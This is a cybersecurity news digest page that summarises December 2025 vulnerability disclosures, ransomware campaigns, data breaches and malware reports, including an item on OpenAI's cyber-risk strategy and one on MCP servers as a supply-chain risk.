CISA Orders Federal Agencies to Patch Actively Exploited Critical GeoServer XXE Flaw

The U.S. Cybersecurity and Infrastructure Security Agency (CISA) has added a critical XML External Entity (XXE) injection vulnerability in OSGeo GeoServer, CVE-2025-58360, to its Known Exploited Vulnerabilities (KEV) catalog. The flaw, which has a CVSS score up to 9.8, allows an unauthenticated remote attacker to read arbitrary files, perform Server-Side Request Forgery (SSRF) attacks, or cause a denial-of-service. Due to evidence of active exploitation, CISA has mandated that all Federal Civilian Executive Branch agencies patch the vulnerability by January 1, 2026. All organizations using the popular open-source geospatial data server are strongly urged to apply the available updates immediately.

Dec 16, 20255 min read

Active Attacks Exploit Critical Fortinet SSO Bypass Flaws to Gain Admin Access

Security firm Arctic Wolf has observed active exploitation of two critical authentication bypass vulnerabilities in Fortinet products, CVE-2025-59718 and CVE-2025-59719. Both flaws, rated 9.1 in severity, allow an unauthenticated attacker to bypass FortiCloud single sign-on (SSO) by forging a SAML message, granting them administrative access to affected devices. The attacks, observed since December 12, 2025, target the default 'admin' account. The vulnerability is present if the FortiCloud SSO feature is enabled, which can be activated automatically when registering a device. Patches are available, and administrators are urged to upgrade immediately or disable the vulnerable SSO feature.

Dec 16, 20256 min read

FreePBX Patches Critical Auth Bypass and RCE Flaws; Update VoIP Platforms Immediately

The popular open-source VoIP platform FreePBX has been updated to fix several serious security vulnerabilities, including a critical authentication bypass (CVE-2025-66039) with a 9.3 CVSS score. This flaw, present in a non-default configuration, allows an attacker to bypass the admin login and potentially achieve remote code execution. Other patched high-severity issues include multiple authenticated SQL injection flaws (CVE-2025-61675) and an arbitrary file upload bug (CVE-2025-61678). These could be chained to upload a web shell and take full control of the server. Administrators are urged to update their FreePBX instances to the latest versions to mitigate these risks.

Dec 16, 20256 min read

New 'PyStoreRAT' Malware Spreads Via Fake OSINT and AI Tools on GitHub

A new malware campaign is distributing an information-stealing Remote Access Trojan (RAT) called 'PyStoreRAT' through fake GitHub repositories. Threat actors create repositories for what appear to be legitimate OSINT, AI, or DeFi tools, artificially inflating their popularity with fake stars and forks. After gaining a user's trust, the attackers push a malicious update containing PyStoreRAT. The malware is designed to evade detection, establish persistence, and steal sensitive data, with a particular focus on cryptocurrency wallets. It can also download secondary payloads like the Rhadamanthys infostealer and propagates via USB drives, posing a significant threat to developers and security researchers.

Dec 16, 20256 min read

700Credit Data Breach Exposes PII of 5.6 Million Individuals

The U.S. fintech company 700Credit, a major provider of credit reports and data services to the automotive industry, has disclosed a data breach affecting at least 5.6 million individuals. The incident, which occurred in October 2025, resulted in an unauthorized actor gaining access to and stealing a significant amount of personally identifiable information (PII). The compromised data includes names, addresses, dates of birth, and Social Security numbers. 700Credit serves approximately 18,000 auto dealerships, and the breach involved data collected between May and October 2025. The company is providing credit monitoring services to affected individuals, and authorities are urging victims to consider credit freezes to prevent identity theft and fraud.

Dec 15, 20256 min read

New 'Gentlemen' Ransomware Group Deploys Advanced GPO and BYOVD Attacks

A new ransomware operation, identifying itself as the "Gentlemen" group, has been observed conducting double-extortion attacks against corporate networks. The group employs sophisticated techniques to achieve its objectives, including the manipulation of Group Policy Objects (GPOs) for wide-scale ransomware deployment across victim networks. Additionally, the threat actor leverages the 'Bring Your Own Vulnerable Driver' (BYOVD) technique to escalate privileges and disable or bypass endpoint security solutions. The emergence of the Gentlemen group highlights the continued evolution in ransomware tactics, combining data theft with advanced defense evasion and lateral movement strategies.

Dec 15, 20256 min read

CVSS 10.0: Atlassian Patches Critical RCE Flaw in Apache Tika Dependency

Atlassian has issued security updates for a critical vulnerability, CVE-2025-66516, in the Apache Tika parser library, a third-party dependency used in many of its products. The flaw, which carries a perfect CVSS score of 10.0, is an XML External Entity (XXE) injection vulnerability. It can be exploited by uploading a specially crafted file, such as a PDF containing a malicious XFA, potentially leading to information disclosure, server-side request forgery (SSRF), or even remote code execution (RCE). The vulnerability affects a wide range of Atlassian's server and data center products, including Jira, Confluence, and Bamboo. Customers are urged to apply the patches immediately.

Dec 15, 20256 min read

xHunt Espionage Group Returns, Targeting Kuwait with New PowerShell Backdoors

The cyber-espionage threat actor known as xHunt has resumed operations with a new campaign targeting organizations in Kuwait. Active since at least 2018, the group is focusing its latest attacks on the shipping, transportation, and government sectors. Researchers have observed xHunt infiltrating networks by targeting Microsoft Exchange and IIS web servers. Once inside, the group deploys a family of custom PowerShell-based backdoors, with tool names like 'Hisoka' and 'Netero' derived from the anime 'Hunter x Hunter'. The campaign's objective appears to be long-term intelligence collection and espionage, leveraging stealthy techniques to maintain persistence.

Dec 15, 20256 min read

New '01flip' Ransomware, Written in Rust, Targets Critical Infrastructure in APAC

A new and stealthy cross-platform ransomware strain named "01flip" has been discovered targeting critical infrastructure organizations in the Asia-Pacific region. The malware is written in the Rust programming language, enabling it to be compiled for both Windows and Linux systems and enhancing its ability to evade detection. Attackers have been observed exploiting exposed services for initial access, then deploying the open-source Sliver command-and-control (C2) framework for reconnaissance and lateral movement before executing the 01flip ransomware. The campaign highlights a growing trend of threat actors using modern, memory-safe languages like Rust to develop more sophisticated and evasive malware.

Dec 15, 20256 min read

LastPass Fined £1.2M by UK Regulator Over 2022 Security Failures

The UK's Information Commissioner's Office (ICO) has fined password manager provider LastPass £1.2 million (approximately $1.6 million) for significant security failures that led to a major data breach in 2022. The regulator found that LastPass failed to implement adequate technical and security measures to protect its users' data. The 2022 incident resulted in a threat actor gaining unauthorized access to a backup database, which contained the data of 1.6 million UK users, including encrypted password vaults. The fine highlights the serious regulatory consequences for security companies that do not meet their data protection obligations.

Dec 15, 20254 min read

India Confirms GPS Spoofing Attacks Targeted Seven Major Airports

The Indian government has officially confirmed that a series of cyber incidents involving GPS spoofing have occurred at seven of the nation's major airports. The attacks, which targeted airports in Delhi, Mumbai, Kolkata, and Bengaluru among others, disrupted navigation data for aircraft utilizing GPS-based landing procedures. Despite the signal manipulation, government officials reported that no flights were canceled or diverted. The successful handling of the incidents was attributed to the implementation of contingency measures and robust safeguards by Air Traffic Control, which allowed for safe operations using alternative navigation aids. The events underscore the growing vulnerability of critical transportation infrastructure to cyberattacks.

Dec 15, 20256 min read

Apple Rushes iOS 26.2 Update to Patch Two Actively Exploited Zero-Days

Apple has released an emergency security update, iOS 26.2 and iPadOS 26.2, to address 26 vulnerabilities. Among these are two critical zero-day flaws, CVE-2025-43529 and CVE-2025-14174, both residing in the WebKit browser engine. The company confirmed reports that these vulnerabilities have been actively exploited in sophisticated, targeted spyware campaigns, potentially allowing attackers to execute arbitrary code on unpatched devices. The update also patches a severe kernel vulnerability, CVE-2025-46285, that could grant an attacker root privileges. All iPhone and iPad users are urged to update their devices immediately.

Dec 14, 20255 min read

CISA KEV Alert: Actively Exploited RCE Flaw in Sierra Wireless Routers

The U.S. Cybersecurity and Infrastructure Security Agency (CISA) has added a critical vulnerability in Sierra Wireless AirLink routers, CVE-2018-4063, to its Known Exploited Vulnerabilities (KEV) catalog. The flaw, which has a CVSS score as high as 9.9, is an unrestricted file upload vulnerability that allows an authenticated attacker to achieve remote code execution (RCE). Due to evidence of active exploitation, CISA has mandated that all Federal Civilian Executive Branch (FCEB) agencies patch the vulnerability by a specified deadline, highlighting the severe risk it poses to network infrastructure.

Dec 14, 20254 min read

Germany Summons Russian Ambassador Over Suspected Air Traffic Control Cyberattack

In a significant diplomatic escalation, the German government has summoned the Russian Ambassador to Berlin following allegations of a cyberattack targeting the nation's air traffic control (ATC) systems. The incident, reported on December 13, 2025, has raised grave concerns about the security of Germany's critical national infrastructure and points towards a potential act of state-sponsored cyber-espionage or disruption. While technical details remain undisclosed, the move underscores the high stakes of cyber hostilities between Western nations and Russia.

Dec 14, 20254 min read

KillSec Ransomware Hits U.S. Financial Firm Daba Finance in Data Extortion Attack

The ransomware group known as KillSec has claimed responsibility for a cyberattack against Daba Finance Inc., a financial services company in the United States. On December 14, 2025, the group listed the company on its data leak site, employing a double-extortion tactic by threatening to release sensitive stolen data if a ransom is not paid. This incident underscores the persistent threat that data extortion gangs pose to the financial sector, which remains a high-value target due to the sensitive customer and corporate information it handles.

Dec 14, 20254 min read

WestJet Data Breach Exposes Info of 1.2 Million Passengers; Scattered Spider Suspected

Canadian airline WestJet has disclosed a significant data breach that occurred in June 2025, impacting approximately 1.2 million passengers. The compromised data includes sensitive personal information such as names, contact details, and travel documentation. While investigations are ongoing, some reports suggest the notorious Scattered Spider hacking group, known for its social engineering prowess, may be behind the attack. The breach poses a serious risk of identity theft and fraud for the affected customers.

Dec 14, 20254 min read

"Catastrophic" Data Breach at Norwegian News Agency NTB Exposes Customer Data

NTB (Norsk Telegrambyrå), Norway's leading news and content provider, has disclosed what it calls a "catastrophic" data breach that occurred in early December 2025. The company announced on December 13 that attackers exploited vulnerabilities in its systems to gain unauthorized access to its customer database, exposing sensitive personal information, detailed customer profiles, and internal communications for thousands of users. NTB is now undertaking a major overhaul of its security infrastructure in response.

Dec 14, 20253 min read

Eswatini Faces Cybersecurity Crisis as Government Fails to Act on Rising Threats

A report published on December 13, 2025, reveals a deepening cybersecurity crisis in the Kingdom of Eswatini. The nation is experiencing a significant increase in cyberattacks targeting citizens, businesses, and government bodies. This surge is compounded by a lack of effective government response, characterized by outdated laws, minimal funding for cybersecurity initiatives, a severe shortage of skilled personnel, and a failure to implement its own national cybersecurity strategy. As a result, the country's digital infrastructure remains highly vulnerable to escalating threats.

Dec 14, 20253 min read

Stealthy NANOREMOTE Backdoor Abuses Google Drive API for C2 Communications

A new and fully-featured Windows backdoor, dubbed NANOREMOTE, has been discovered by Elastic Security Labs. Written in C++, the malware distinguishes itself by using the Google Drive API for all command-and-control (C2) communications, allowing it to blend in with legitimate cloud traffic and evade traditional network security. The malware, which shares characteristics with the FINALDRAFT implant, is capable of reconnaissance, file transfer, and command execution. This tactic poses a significant challenge for organizations, especially those using Google Workspace, as it makes detecting malicious activity within sanctioned cloud services difficult.

Dec 13, 20255 min read

OpenAI Unveils Strategy to Manage 'High' Risk AI Cybersecurity Threats

OpenAI has announced its strategy for managing the significant cybersecurity risks posed by its increasingly powerful AI models. The company will now treat all future models as potentially 'High' risk under its Preparedness Framework, capable of automating vulnerability discovery and exploitation. Key components of the plan include forming a 'Frontier Risk Council' of external experts, creating a tiered, trusted access program for cyber defense tools, and collaborating with industry partners. The move reflects growing concerns over the potential weaponization of AI for malicious cyber operations.

Dec 13, 20253 min read

CISA Updates Cybersecurity Performance Goals for Critical Infrastructure

On December 11, CISA released an updated version of its voluntary Cybersecurity Performance Goals (CPGs), designed to help critical infrastructure operators bolster their defenses. The new version aligns with the latest NIST standards and places a stronger emphasis on governance, accountability, and risk management. The CPGs provide a baseline of measurable cybersecurity actions that organizations, including those in the healthcare sector, can take to protect against common and impactful threats, promoting a more resilient and proactive security posture.

Dec 13, 20253 min read

Makop Ransomware Evolves, Using GuLoader and New Exploits in Attacks on India

A new campaign by the Makop ransomware group is primarily targeting enterprises in India, with additional victims in Brazil and Germany. The attackers continue to use brute-force attacks against exposed RDP services for initial access. Once inside, they now use the GuLoader downloader to deliver secondary payloads like the AgentTesla and FormBook infostealers. For privilege escalation, the group is exploiting vulnerabilities like CVE-2025-7771 in the ThrottleStop driver to gain kernel-level access and disable security products before deploying the final ransomware payload.

Dec 13, 20255 min read

Google Patches Eighth Chrome Zero-Day of 2025 Under Active Attack

Google has released an emergency, out-of-band security update for its Chrome browser, patching its eighth zero-day vulnerability of 2025. The high-severity flaw, tracked as issue 466192044, is confirmed to be actively exploited in the wild. To prevent further abuse, Google has withheld technical details but analysis suggests it may be a buffer overflow in the ANGLE graphics library. All 3.4 billion Chrome users are urged to update their browsers immediately to version 143.0.7499.109 or later.

Dec 13, 20254 min read

Conduent Breach Exposes 10.5M Patients, Ranks as 8th Largest US Healthcare Breach

Business services giant Conduent has disclosed a massive data breach that exposed the personal and medical information of over 10.5 million people, making it the 8th largest healthcare data breach in U.S. history. The breach, which was active for months between October 2024 and January 2025, has already cost the company $25 million in response efforts. The compromised data includes names, Social Security numbers, and health information, leading to multiple class-action lawsuits against the company.

Dec 12, 20255 min read

"Battering RAM": $50 Hardware Attack Cracks Intel and AMD Secure CPU Enclaves

At the Black Hat Europe 2025 conference, researchers from KU Leuven University demonstrated "Battering RAM," a novel hardware attack that completely undermines modern confidential computing technologies. Using a custom-built DDR4 interposer costing just $50, the attack can bypass the memory encryption of secure enclaves like Intel SGX and AMD SEV. This allows an attacker with physical access to read encrypted memory at runtime, extract secret keys, and defeat protections previously thought to be secure against physical threats.

Dec 12, 20255 min read

TriZetto Discloses Year-Long Data Breach Exposing Patient PHI

TriZetto Provider Solutions, a healthcare revenue management company owned by Cognizant, has started notifying clients about a major data breach. An unauthorized party had access to patient data for nearly a full year, from November 2024 until the breach was detected on October 2, 2025. The attackers accessed historical reports containing sensitive Protected Health Information (PHI), including patient names, Social Security numbers, dates of birth, and health insurance details. The cybersecurity firm Mandiant was brought in to investigate the long-running intrusion.

Dec 12, 20255 min read

NATO Sharpens Cyber Defenses in Massive "Cyber Coalition" War Game

NATO has successfully concluded its largest annual cyber defense exercise, "Cyber Coalition," in Tallinn, Estonia. The week-long event involved approximately 1,500 military and civilian personnel from 29 NATO members and seven partner nations. Participants collaborated to defend a fictional nation's critical infrastructure against a series of realistic, hybrid cyberattacks, enhancing their collective ability to respond to modern threats.

Dec 11, 20254 min read

Critical Infrastructure at Risk Due to "Deficient" OT Cybersecurity Training

A new report from Australian cybersecurity firm Secolve has exposed significant deficiencies in operational technology (OT) cybersecurity training across critical infrastructure sectors. The survey of senior professionals in industries like energy, manufacturing, and water found that training is often generic, infrequent, or completely ignored. This lack of specialized training is creating a dangerously immature security culture and leaving vital industrial environments unprepared for cyberattacks.

Dec 11, 20254 min read

Hamas-Linked APT "Ashen Lepus" Targets Middle East with New "AshTag" Malware

The Hamas-affiliated advanced persistent threat (APT) group known as Ashen Lepus (or WIRTE) is conducting an ongoing espionage campaign targeting governmental and diplomatic entities in the Middle East. Researchers have identified a new, modular .NET malware suite named AshTag being used in these attacks. The campaign marks a significant evolution in the group's sophistication, incorporating enhanced encryption, in-memory payload execution, and the use of legitimate-looking subdomains to evade detection.

Dec 11, 20254 min read

"Operation DupeHike" Espionage Campaign Targets Russian Corporate HR Depts

A highly targeted cyber-espionage campaign, dubbed "Operation DupeHike," has been identified targeting employees in Russian corporations. Attributed to the threat actor cluster UNG0902, the campaign uses convincing social engineering lures, such as decoy documents about employee bonuses, to infiltrate networks. The primary targets are staff in HR, payroll, and administrative departments, with the goal of achieving persistent surveillance and exfiltrating sensitive corporate data.

Dec 11, 20254 min read

Unpatched Zero-Day in Gogs Git Service Actively Exploited to Gain SSH Access

A critical, unpatched zero-day vulnerability in Gogs, a popular self-hosted Git service, is being actively exploited in the wild. Tracked as CVE-2025-8110 with a CVSS score of 8.7, the flaw is a bypass of a previously patched RCE and allows an attacker to overwrite arbitrary files, ultimately leading to SSH access on the server. Researchers at Wiz have identified over 700 compromised instances, with attackers deploying the Supershell C2 framework.

Dec 11, 20254 min read

Fake Leonardo DiCaprio Movie Torrent Used as Bait to Spread Agent Tesla Trojan

Cybercriminals are luring victims with a fake torrent for a new Leonardo DiCaprio movie to distribute the Agent Tesla information-stealing trojan. Security researchers at Bitdefender analyzed the campaign, revealing a complex, multi-stage attack chain that uses a malicious .lnk shortcut, hidden batch commands in subtitle files, and multiple layers of PowerShell to execute the final payload. The malware runs only in memory and establishes persistence through a fake audio diagnostic task, making it highly evasive.

Dec 11, 20254 min read

React2Shell: Critical 10.0 CVSS RCE Flaw in React and Next.js Under Active Exploitation

A critical, unauthenticated remote code execution (RCE) vulnerability, dubbed 'React2Shell' (CVE-2025-55182), has been disclosed in React Server Components, affecting popular frameworks like Next.js. With a maximum CVSS score of 10.0, the flaw allows attackers to compromise servers with a single crafted HTTP request, requiring no user interaction. The vulnerability stems from an unsafe deserialization process in the 'Flight' protocol. Following the public disclosure on December 3, 2025, multiple weaponized proofs-of-concept became available, and active exploitation attempts by threat actors, including China-nexus groups, were observed. CISA has added CVE-2025-55182 to its Known Exploited Vulnerabilities (KEV) catalog, mandating immediate patching for federal agencies and urging all organizations to update affected components.

Dec 10, 20256 min read

Data Disaster: 4.3 Billion Records Leaked from Unprotected MongoDB Instance

One of the largest lead-generation data leaks ever recorded has been discovered by researchers from Cybernews and Bob Diachenko. An unprotected MongoDB instance, left publicly accessible without a password, exposed a staggering 4.3 billion documents, totaling 16.14 terabytes of data. The dataset contains highly detailed and structured professional and corporate intelligence, with much of the information appearing to be scraped from LinkedIn. Exposed data includes names, email addresses, phone numbers, employment history, and LinkedIn profile details. While the database was secured two days after discovery, the unknown duration of its exposure creates a significant risk of this data being used for sophisticated phishing, social engineering, and identity theft campaigns on a massive scale.

Dec 10, 20255 min read

OPSEC Fail: North Korean Spy 'Trevor Greer' Exposed by Own Infostealer Infection

In a major operational security (OPSEC) failure, a North Korean state-sponsored hacker was unmasked after accidentally infecting their own machine with commodity infostealer malware like LummaC2. The leaked logs, analyzed by Flashpoint and Hudson Rock, exposed the digital life of an operative using the persona 'Trevor Greer.' The data revealed fake identities, cryptocurrency ventures, and, most notably, a direct link to the $1.5 billion cryptocurrency heist from the exchange Bybit. The actor had registered a phishing domain, 'Bybit-assessment.com,' prior to the attack. This rare glimpse into an APT operator's personal machine highlights that even sophisticated actors make human errors, providing invaluable intelligence for defenders.

Dec 10, 20255 min read

GrayBravo MaaS Fuels Cybercrime with CastleLoader Malware

The cybercrime ecosystem is becoming more industrialized with the rise of Malware-as-a-Service (MaaS) operations like 'GrayBravo.' According to Recorded Future's Insikt Group, GrayBravo is developing and distributing a sophisticated loader called CastleLoader to at least four separate threat clusters. These clusters then use the loader to deploy various payloads, including RedLine Stealer and NetSupport RAT. The campaigns show specialization, with one group targeting the logistics sector using phishing and social engineering, while another uses Booking.com lures to target the hospitality industry. GrayBravo's operation, which features rapid development and a large infrastructure, exemplifies how MaaS providers empower less-skilled actors to launch effective and widespread attacks.

Dec 10, 20255 min read

DeadLock Ransomware Uses Vulnerable Baidu Driver to Blind EDRs

A new DeadLock ransomware campaign is leveraging a novel "Bring Your Own Vulnerable Driver" (BYOVD) loader to exploit a vulnerability (CVE-2024-51324) in a legitimate Baidu Antivirus driver, `BdApiUtil.sys`. This technique allows the threat actors to terminate any process, including endpoint detection and response (EDR) and antivirus solutions, from the kernel level. By blinding security tools, the attackers can deploy the ransomware unimpeded. The attack chain, analyzed by Cisco Talos, also involves PowerShell scripts to disable Windows Defender and delete volume shadow copies, severely hindering detection and recovery efforts.

Dec 9, 20255 min read

Code-to-Cloud Attacks: Leaked GitHub Tokens Become Keys to the Kingdom

Security researchers at Wiz have detailed an emerging "code-to-cloud" attack vector where threat actors leverage compromised GitHub Personal Access Tokens (PATs) to pivot from code repositories directly into production cloud environments. By abusing the trust between GitHub and connected Cloud Service Providers (CSPs), attackers with even basic read permissions can discover secret names, then use write permissions to execute malicious GitHub Actions that exfiltrate CSP credentials. The attack is particularly stealthy as API calls to search for secret names are not logged by GitHub Enterprise, creating a major visibility gap for defenders.

Dec 9, 20256 min read

New 'Broadside' Botnet Exploits DVRs to Target Maritime Logistics

A new, sophisticated variant of the Mirai botnet, dubbed "Broadside," is actively exploiting a command injection vulnerability (CVE-2024-3721) in TBK Digital Video Recorder (DVR) devices. According to research from Cydome, the campaign specifically targets the maritime logistics sector, where these DVRs are common. Broadside is more advanced than typical Mirai variants, using stealthier techniques and a custom C2 protocol. Crucially, its goals extend beyond DDoS to include credential harvesting and lateral movement, turning compromised DVRs into strategic footholds on vessel networks.

Dec 9, 20256 min read

AI Threat Hunting Exposes 'GhostPenguin,' a Linux Backdoor Undetected for Months

Researchers at Trend Micro have discovered "GhostPenguin," a sophisticated, multi-threaded Linux backdoor written in C++. The malware remained completely undetected on VirusTotal for over four months after its initial submission. It was ultimately found using an AI-driven automated threat hunting pipeline designed to analyze zero-detection samples. GhostPenguin provides attackers with full remote shell access and file system control over an RC5-encrypted UDP channel, using port 53 to masquerade as DNS traffic, highlighting the growing need for AI in detecting emerging, stealthy threats.

Dec 9, 20255 min read

Vishing Attackers Impersonate IT on Teams, Trick Users into Running Fileless Malware

A sophisticated vishing (voice phishing) campaign is abusing trusted enterprise tools to deploy stealthy malware. Attackers impersonate IT support staff on Microsoft Teams, convincing users to initiate a Windows Quick Assist session. Once they have remote access, the attackers direct the user to a malicious site to download a loader. This loader then fetches an encrypted payload and executes it directly in memory using .NET reflection, a fileless technique designed to evade traditional antivirus and endpoint detection solutions. The campaign highlights the increasing trend of blending social engineering with the abuse of legitimate software.

Dec 9, 20255 min read

IBM Rolls Out Critical Patches for AIX, Cloud Pak, and Other Enterprise Software

IBM has released a wave of security updates addressing vulnerabilities in numerous enterprise products, prompting an advisory from the Canadian Centre for Cyber Security. The bulletins, published between December 1 and December 7, 2025, include critical patches for IBM AIX, VIOS, Aspera Shares, Business Automation Workflow, and Cloud Pak System, among others. Administrators are strongly urged to review the advisories and apply the necessary updates promptly to protect their infrastructure from potential exploitation.

Dec 9, 20254 min read

Race for Secure Digital Identity Heats Up with New Platforms from IBM and Turing Space

The digital identity space is seeing rapid innovation as IBM launches "Verify Digital Credentials," a new platform for issuing and authenticating secure digital documents like licenses and academic records. Built on open standards, it aims to reduce breach risk by decentralizing data storage. Concurrently, decentralized identity provider Turing Space is partnering with the IOTA blockchain to enhance its own verification offering, aiming to lower costs for enterprise-scale deployment. These moves highlight an industry-wide push towards verifiable credentials as a foundational defense against the growing threat of AI-powered deepfakes and identity fraud.

Dec 9, 20254 min read

Supply Chain Attack: Marquis Software Breach Hits 74 Banks, Akira Ransomware Suspected

Marquis Software Solutions, a U.S.-based financial software provider, has suffered a major data breach, compromising the sensitive information of over 400,000 customers across 74 client banks and credit unions. This significant supply chain attack is suspected to be the work of the Akira ransomware gang. According to investigators, the threat actors likely gained initial access by exploiting vulnerabilities in SonicWall firewall devices on Marquis's network. This incident highlights the cascading risk in the financial sector, where a compromise at a single software vendor can have widespread consequences for numerous downstream institutions and their customers.

Dec 8, 20255 min read

White House Sets 2025 Deadline for Post-Quantum Crypto Readiness

The White House has issued a new Executive Order to accelerate the U.S. federal government's transition to post-quantum cryptography (PQC). The order sets a critical deadline of December 1, 2025, for several key initiatives. It directs CISA and the NSA to create and maintain a list of commercially available products that support PQC standards, guiding federal procurement. It also mandates the development of new requirements for federal agencies to support TLS 1.3, a necessary precursor for PQC integration. Additionally, NIST is tasked with updating its Secure Software Development Framework (SSDF) to include practices for developing quantum-resistant software.

Dec 8, 20255 min read

WhatsApp Worm Spreads Astaroth Banking Trojan in New Brazilian Campaign

A new malware campaign, tracked as STAC3150, is targeting banking users in Brazil by using WhatsApp Web as a distribution vector for the Astaroth banking trojan. The attack begins with a social engineering lure sent via WhatsApp, which persuades the victim to download a malicious ZIP archive. The archive contains a VBS or HTA file that, when executed, initiates a multi-stage infection process to deploy the Astaroth trojan. Astaroth is a well-known information stealer designed to capture banking credentials and other sensitive data. This campaign highlights the increasing use of popular messaging platforms for malware delivery.

Dec 8, 20254 min read

SharePoint Flaw Chain Exploited to Deploy Warlock Ransomware

A new attack campaign attributed to the threat actor Storm-2603 is exploiting a chain of Microsoft SharePoint vulnerabilities (CVE-2025-49706, CVE-2025-49704) for initial access. Post-exploitation, the attackers deploy Velociraptor, a legitimate digital forensics and incident response (DFIR) tool, for reconnaissance and persistence. By abusing a trusted tool, the attackers blend in with normal administrative activity, evading detection. In several confirmed incidents, this attack chain culminates in the deployment of the Warlock ransomware. This 'living-off-the-land' technique highlights a sophisticated approach to facilitating ransomware attacks.

Dec 8, 20255 min read

Supply Chain Breach at Vendor Marquis Exposes Data From Dozens of US Banks

A ransomware attack on Marquis Software Solutions, a marketing and data analytics vendor for the financial industry, has resulted in a significant supply chain data breach affecting dozens of U.S. banks and credit unions. Marquis began notifying its clients on November 26, 2025, about the incident, which was first detected in August. The breach exposed highly sensitive customer information, including names, Social Security numbers, taxpayer IDs, and financial account details, that the financial institutions had entrusted to the vendor. While the banks' internal systems were not compromised, the incident highlights the profound risks associated with third-party vendors. At least 42,000 individuals in Maine alone have been affected, and Marquis is offering credit monitoring services to impacted customers.

Dec 8, 20256 min read

Malicious Go Packages Impersonating Google UUID Library Steal Data

A sophisticated and long-running supply chain attack targeting Go developers has been discovered, active since at least May 2021. The attack involves two malicious packages, `github.com/bpoorman/uuid` and `github.com/bpoorman/uid`, which impersonate a popular Google UUID library using a typosquatting technique. The counterfeit packages are fully functional to avoid suspicion but contain a hidden backdoor. A specific function, `Valid`, is weaponized to secretly encrypt and exfiltrate any data passed to it, such as user IDs or session tokens, to an external paste site. This stealthy method allows the attacker, 'bpoorman', to siphon sensitive information from compromised applications.

Dec 7, 20254 min read

Mexico's Maguen Group Launches Global Cybersecurity Brand 'Fortem'

Maguen Group, a leading private security firm based in Mexico, has officially launched Fortem Cybersecurity, its new global cybersecurity brand, on December 7, 2025. The new entity is an evolution of the company's existing cybersecurity arm, MT Cyber, which it acquired in 2019. With Fortem, Maguen Group aims to 'democratize cybersecurity' by offering enterprise-level protection to companies of all sizes. The launch marks a strategic push for global expansion, leveraging its existing presence in Mexico, Ecuador, and Germany, with the United States targeted as the next major market.

Dec 7, 20252 min read

Malicious Rust Package 'evm-units' Targets Web3 Developers

A malicious software package named 'evm-units' has been discovered and removed from Rust's official crates.io registry. The package, downloaded over 7,200 times, targeted Web3 developers by impersonating a legitimate utility for the Ethereum Virtual Machine (EVM). While appearing functional, the crate contained a stealthy, multi-stage loader designed to download and execute operating system-specific malware. The malware included code to specifically evade 360 Total Security, a popular antivirus in China, suggesting the threat actor's focus was on stealing cryptocurrency from developers, likely in the Asian market. A second package, 'uniswap-utils', was also removed for depending on the malicious crate.

Dec 7, 20254 min read

Wireshark Vulnerabilities Create Denial-of-Service Risk for Security Teams

France's national cybersecurity agency, CERT-FR, has issued a security advisory for two critical vulnerabilities in Wireshark, the world's most popular network protocol analyzer. The flaws, identified as CVE-2025-13945 and CVE-2025-13946, can be exploited by a remote attacker to cause a denial-of-service (DoS) condition. This poses a significant risk to security operations, as an attacker could crash the tool during a live incident investigation, effectively blinding security analysts. Users are urged to update to the patched versions (4.4.12 and 4.6.2) to mitigate the risk.

Dec 7, 20253 min read

Washington Post Breached by Clop Ransomware via Oracle Flaws

The Washington Post has officially confirmed it was a victim of a large-scale cyberattack orchestrated by the Clop ransomware group. The threat actors exploited vulnerabilities in Oracle's E-Business Suite, compromising over 100 organizations globally. The campaign involves data exfiltration followed by aggressive extortion tactics, with Clop publicly naming victims on its dark web leak site to pressure them into paying ransoms reportedly as high as $50 million. This incident underscores the significant risk posed by vulnerabilities in widely used enterprise software and the sophisticated, multi-faceted extortion methods employed by modern ransomware gangs.

Dec 7, 20256 min read

CISA: Commercial Spyware Hijacking Signal & WhatsApp via Zero-Clicks

The U.S. Cybersecurity and Infrastructure Security Agency (CISA) has issued a critical alert regarding active campaigns using commercial spyware to compromise the Signal and WhatsApp accounts of high-value targets. Attackers are employing sophisticated methods including social engineering, malicious QR codes for device linking, and zero-click exploits that require no user interaction. The campaigns are reportedly targeting current and former government officials, military personnel, and civil society organizations across the U.S., Europe, and the Middle East. CISA warns that initial access to messaging apps is often used as a beachhead to deploy further malware and achieve full device compromise.

Dec 7, 20255 min read

Global Coalition Targets 'Bulletproof' Hosting Services Fueling Cybercrime

An international coalition of cybersecurity agencies, including the NSA, CISA, and the FBI, has launched a coordinated effort to combat 'bulletproof' hosting (BPH) providers. These services knowingly lease infrastructure to cybercriminals for activities like ransomware and phishing. A new joint advisory urges Internet Service Providers (ISPs) and network defenders to adopt strategies to identify, block, and report these malicious hosts. The guidance focuses on a nuanced approach, including creating high-confidence blocklists and improving 'know your customer' processes, to disrupt the foundational infrastructure of cybercrime.

Dec 6, 20254 min read

Cloudflare Outage Hits 28% of Global Traffic After Faulty React2Shell Patch

Cloudflare, a leading internet infrastructure provider, experienced a 25-minute global outage on December 5, 2025, that impacted approximately 28% of its HTTP traffic and made numerous popular websites inaccessible. The company quickly confirmed the disruption was not a cyberattack but was self-inflicted, caused by a faulty emergency change to its Web Application Firewall (WAF). The problematic update was deployed to provide mitigation against the critical React2Shell (CVE-2025-55182) vulnerability. The incident highlights the inherent risks of rapid, large-scale deployments, even when intended to improve security, and raises questions about change management processes for critical infrastructure.

Dec 6, 20254 min read

AI Infrastructure at Risk: MCP Servers Emerge as New Supply Chain Threat

A new security advisory warns that Model Context Protocol (MCP) servers represent a significant and growing supply chain risk for organizations building AI-powered applications. These servers act as highly privileged automation engines, often possessing trusted access to sensitive enterprise resources like code repositories, email systems, and internal APIs. The warning follows the analysis of a critical vulnerability at hosting service Smithery.ai, where a single path traversal flaw could have allowed an attacker to gain administrative control over 3,000 hosted MCP servers. This and other incidents demonstrate that MCP servers are high-value targets that can be exploited to compromise entire AI software supply chains.

Dec 6, 20255 min read

Iran Bans Officials From Using All Internet-Connected Devices Over Espionage Fears

In a drastic measure to combat espionage, Iran's Cybersecurity Command has banned all government officials and their security staff from using any device connected to public communication networks. The directive, reported on December 5, 2025, includes smartphones, laptops, and smartwatches. The move is a direct response to fears of hacking and mobile tracking being used for targeted assassinations, referencing past attacks on nuclear scientists and recent pager and walkie-talkie attacks against Hezbollah. The policy highlights a security philosophy of complete network isolation for key personnel over reliance on defensive technology.

Dec 6, 20254 min read

Massive Supply Chain Attack Hits 200+ Companies via Salesforce App; Hacker Group Claims Breach

